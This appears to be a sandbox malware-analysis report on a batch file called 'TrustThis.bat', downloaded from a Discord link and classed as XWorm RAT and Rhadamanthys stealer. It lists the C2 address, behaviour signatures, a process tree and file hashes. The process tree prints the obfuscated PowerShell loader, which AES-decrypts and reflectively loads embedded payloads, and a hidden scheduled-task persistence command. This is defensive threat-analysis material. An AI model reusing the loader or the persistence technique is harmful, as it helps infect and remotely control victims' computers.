Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows11-21h2-x64

10

Analysis

  • max time kernel
    132s
  • max time network
    133s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04/03/2025, 16:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1225566112306040944/1258428441439637635/TrustThis.bat?ex=67c85ed0&is=67c70d50&hm=20e94d244b8643fcd7ed0b5dc982c6192e9668f203a8bc64ec2d069947af5e1a&

Score
10/10
rhadamanthysxwormdiscoveryexecutionratstealertrojan

Malware Config

Extracted

Family

xworm

C2

paris-itself.gl.at.ply.gg:49485

Attributes
  • Install_directory

    %Public%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Rhadamanthys family
    rhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2464
      • C:\Windows\system32\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
          PID:3936
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        PID:3356
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1225566112306040944/1258428441439637635/TrustThis.bat?ex=67c85ed0&is=67c70d50&hm=20e94d244b8643fcd7ed0b5dc982c6192e9668f203a8bc64ec2d069947af5e1a&
          2⤵
          • Enumerates system info in registry
          • Modifies registry class
          • NTFS ADS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2280
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe64753cb8,0x7ffe64753cc8,0x7ffe64753cd8
            3⤵
              PID:968
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
              3⤵
                PID:2172
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1548
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
                3⤵
                  PID:5060
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                  3⤵
                    PID:1620
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                    3⤵
                      PID:1732
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                      3⤵
                        PID:3628
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                        3⤵
                          PID:2916
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
                          3⤵
                            PID:2840
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
                            3⤵
                              PID:4568
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
                              3⤵
                                PID:2908
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:8
                                3⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:764
                              • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
                                3⤵
                                  PID:4776
                                • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3804
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 /prefetch:8
                                  3⤵
                                  • NTFS ADS
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2120
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3408 /prefetch:2
                                  3⤵
                                    PID:3172
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
                                    3⤵
                                      PID:3608
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                      3⤵
                                        PID:1116
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
                                        3⤵
                                          PID:4792
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TrustThis.bat" "
                                        2⤵
                                          PID:4580
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r8/Zl2ecne/3MZcG/uh0q3ioBEhiW/bhw3Tyinq/3G8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nm+LG7aKYHflmvAksVBR6Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ebMMw=New-Object System.IO.MemoryStream(,$param_var); $VCpwn=New-Object System.IO.MemoryStream; $YDZpb=New-Object System.IO.Compression.GZipStream($ebMMw, [IO.Compression.CompressionMode]::Decompress); $YDZpb.CopyTo($VCpwn); $YDZpb.Dispose(); $ebMMw.Dispose(); $VCpwn.Dispose(); $VCpwn.ToArray();}function execute_function($param_var,$param2_var){ $HuWNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eBYtd=$HuWNY.EntryPoint; $eBYtd.Invoke($null, $param2_var);}$wLVWE = 'C:\Users\Admin\Downloads\TrustThis.bat';$host.UI.RawUI.WindowTitle = $wLVWE;$eihJj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wLVWE).Split([Environment]::NewLine);foreach ($nbHzB in $eihJj) { if ($nbHzB.StartsWith('MXAFqxvpoGvwnekBuzqK')) { $hSQxh=$nbHzB.Substring(20); break; }}$payloads_var=[string[]]$hSQxh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                            3⤵
                                              PID:736
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Modifies registry class
                                              • NTFS ADS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2400
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_400_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_400.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3188
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_400.vbs"
                                                4⤵
                                                  PID:3156
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_400.bat" "
                                                    5⤵
                                                      PID:4032
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r8/Zl2ecne/3MZcG/uh0q3ioBEhiW/bhw3Tyinq/3G8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nm+LG7aKYHflmvAksVBR6Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ebMMw=New-Object System.IO.MemoryStream(,$param_var); $VCpwn=New-Object System.IO.MemoryStream; $YDZpb=New-Object System.IO.Compression.GZipStream($ebMMw, [IO.Compression.CompressionMode]::Decompress); $YDZpb.CopyTo($VCpwn); $YDZpb.Dispose(); $ebMMw.Dispose(); $VCpwn.Dispose(); $VCpwn.ToArray();}function execute_function($param_var,$param2_var){ $HuWNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eBYtd=$HuWNY.EntryPoint; $eBYtd.Invoke($null, $param2_var);}$wLVWE = 'C:\Users\Admin\AppData\Roaming\Windows_Log_400.bat';$host.UI.RawUI.WindowTitle = $wLVWE;$eihJj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wLVWE).Split([Environment]::NewLine);foreach ($nbHzB in $eihJj) { if ($nbHzB.StartsWith('MXAFqxvpoGvwnekBuzqK')) { $hSQxh=$nbHzB.Substring(20); break; }}$payloads_var=[string[]]$hSQxh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        6⤵
                                                          PID:2328
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                          6⤵
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3196
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:1484
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:2616
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:2760

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                      Filesize

                                                      3KB

                                                      MD5

                                                      df472dcddb36aa24247f8c8d8a517bd7

                                                      SHA1

                                                      6f54967355e507294cbc86662a6fbeedac9d7030

                                                      SHA256

                                                      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                      SHA512

                                                      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                      Filesize

                                                      152B

                                                      MD5

                                                      615cd26b7a4871b97378112a103e3b0b

                                                      SHA1

                                                      4136381af22dda1fb7aebcd9bf3f7769305bd544

                                                      SHA256

                                                      662925803226ff2e7400ca3a20a44d4d98614845214fb9ed33c7373ee15b71e5

                                                      SHA512

                                                      b67b1d38dc0ef347dfde8f44e231a7e82f30bf216bf0f4a5f499b24aa2cc7a54249f06d49e725138aa637159b0d09de0c020a1e1bb236bd5f9d3d2d4d678824d

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                      Filesize

                                                      152B

                                                      MD5

                                                      71bf6b3c57d5e4c25311c2b2e30a4f61

                                                      SHA1

                                                      f1616a7597c65b900bbbef18dd01239afbb44850

                                                      SHA256

                                                      872b79463d3855598f6b477cd11e7f8c01fa701bcaa273d3720f1670a69f9707

                                                      SHA512

                                                      254bef2252817ff67d43744cb0a7def5db7bb6d723b445d902745a8ab293658a911ad85ede79513838705bd30d9ac0dfa8b69f2863c3121892724226b9b08b48

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                      Filesize

                                                      186B

                                                      MD5

                                                      094ab275342c45551894b7940ae9ad0d

                                                      SHA1

                                                      2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                                      SHA256

                                                      ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                                      SHA512

                                                      19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                      Filesize

                                                      5KB

                                                      MD5

                                                      7ce290a579e818b14f543e08e07f5c9c

                                                      SHA1

                                                      9ae1f5490fa8a9538794f7b1f6572efdfff36aaa

                                                      SHA256

                                                      151458c11e90b908363ae09c4285d8e73be5c7fab3a56b623a1945a19a4c3bb9

                                                      SHA512

                                                      da038973bba7414c43a493e33ed7457d8973d411245a9931fa41396fac85a118c673b440150e48ed738624dd5b6b4807fd0dd723fe43ae8be50df81e07a77163

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                      Filesize

                                                      5KB

                                                      MD5

                                                      3ba801149139c36d7ea110cbad501d13

                                                      SHA1

                                                      ca183f20c05c4863a296e6e66fb730e1c4fb685f

                                                      SHA256

                                                      d18c29dcd89d0a834cbc2ad952cec004a0248e41678ef4511947b983f0eec910

                                                      SHA512

                                                      968b0fa46610f3f9356c4367d98b924b68256d4058bcd8c57e758fad912d13b5f0809f03b0e855e513af6624d73be2458197f4e1282171fc690ac145330f7939

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                      Filesize

                                                      5KB

                                                      MD5

                                                      429aca79b27c95511aeda127edb65b32

                                                      SHA1

                                                      905f54cda543198aace96199233e9877ee48762d

                                                      SHA256

                                                      551c8f7684d049f831e85ff04003c786b2c72ad21c993d8d539b045e721c2db1

                                                      SHA512

                                                      8fb5e9141f465a337d8bc1aee3521f96fde60ff425380f7d0cc399c3d5092b959bac0ab4231af0cdc580f577924b8988d49e46c412e9fe6f61632477768b2720

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                                      Filesize

                                                      25KB

                                                      MD5

                                                      17e06e5e4734edf098fb260d9ea7f7f7

                                                      SHA1

                                                      9ba70165b592c9cf38bba00d7d427339669d935e

                                                      SHA256

                                                      8804b50b3eb37b0e261fa4e1256d4c14d9731022d4d0291832ba832aa397a1dc

                                                      SHA512

                                                      1a8909ff25232284868a7ca33e62a966b6d8c97647cd48689836029eeee1b1b1a1852b34aa5182275d3d93576f9d88593bf936c44a466933e2708b9362b989e4

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                      Filesize

                                                      16B

                                                      MD5

                                                      6752a1d65b201c13b62ea44016eb221f

                                                      SHA1

                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                      SHA256

                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                      SHA512

                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                      Filesize

                                                      11KB

                                                      MD5

                                                      fee621f504da1376cc810d5e87397b14

                                                      SHA1

                                                      bdd09d8cbc322f4f1447c12d8198399944ba4fc0

                                                      SHA256

                                                      fdeb83025c20dcc29ce833af6244b2be53bc2c61f27168d9c4d06be0e1521055

                                                      SHA512

                                                      8e44aa62b2ae590847823ee4dfb33e39cda4aaf455eedeb08b77691688031bdcd4fbe1b0cf1c0190b14b9df7b2a303da2e4b7d1f772550995f2511a584687b41

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\f26f14b8-d2c3-41f5-99cf-20714acbebf8.tmp
                                                      Filesize

                                                      10KB

                                                      MD5

                                                      b2bad87fa5fc76fbc8b8032f1a125cd9

                                                      SHA1

                                                      a7a913c186b3981bd147d1c732a8aac3a12da4aa

                                                      SHA256

                                                      4ba8f7d63715f51adc22222a06848f2d0aef86ecb20eb2dbd35df3580090ba97

                                                      SHA512

                                                      e6b35513659cb539917dbc78ede619fca7ca23e929b5c0cca2f9c50bf19a58994d4a93942b3dfeb1e14930dea6354a7a513c7b61e2a92b69ada6009535fab63b

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      3ec0d76d886b2f4b9f1e3da7ce9e2cd7

                                                      SHA1

                                                      68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

                                                      SHA256

                                                      214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

                                                      SHA512

                                                      a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_noryl1fy.o1h.ps1
                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Roaming\Windows_Log_400.vbs
                                                      Filesize

                                                      115B

                                                      MD5

                                                      4e0de993e6fae5971a53bd5a7b908d53

                                                      SHA1

                                                      8dc0e353d265ed83f2fbbe3c0f9eb11e7cb7a278

                                                      SHA256

                                                      38a935c46112999bba892dce58db047662419a4114d46b0450cdd633f24373c7

                                                      SHA512

                                                      d0c2b178c9ff91173f5e6ea17cf96b60f6e62edca5365f22405833e1d80fae7717c8329c6a7052f697707836ec67b7dfd5a1003b1cc32650406a226d6053dc82

                                                      Download Submit

                                                    • C:\Users\Admin\Downloads\TrustThis.bat:Zone.Identifier
                                                      Filesize

                                                      221B

                                                      MD5

                                                      28d59fb568930e2987ca6cbc351abd74

                                                      SHA1

                                                      95eaf3a6cded37181ed29ecc1519f8d7e698fd8e

                                                      SHA256

                                                      416cb0063e4c242367e1cc89808ba4b293d8a42c9cdacdd811c17f7de614baa1

                                                      SHA512

                                                      fb324b2cc87b172f738d935e510ec33792b212a0cba134311c8fbfd01d5bc4a26896fdacc66b08380f29a1a1f84e72d0fc7d17bfc14c8d7c4b901cd897ac6359

                                                      Download Submit

                                                    • C:\Users\Admin\Downloads\Unconfirmed 247863.crdownload
                                                      Filesize

                                                      399KB

                                                      MD5

                                                      85b6801e12b0ee43cf2560af4de44ce5

                                                      SHA1

                                                      243e69b236417be977c73eadfbdfd55325e125b7

                                                      SHA256

                                                      9925507f83ab80df2cd03ad5ffd66571adc3eaf60c6bf136240e58ff29e13893

                                                      SHA512

                                                      4d792f91e03b70833b51054053a61fabcb11bfb22eb8d47cb19a5268c9633dd50443557b41a56b8ad18def99ab0b1b8e00a3533fec0e89ff668bd4c3ea28b944

                                                      Download Submit

                                                    • memory/2400-143-0x00000219F4E20000-0x00000219F4E66000-memory.dmp

                                                      Filesize

                                                      280KB

                                                      Download

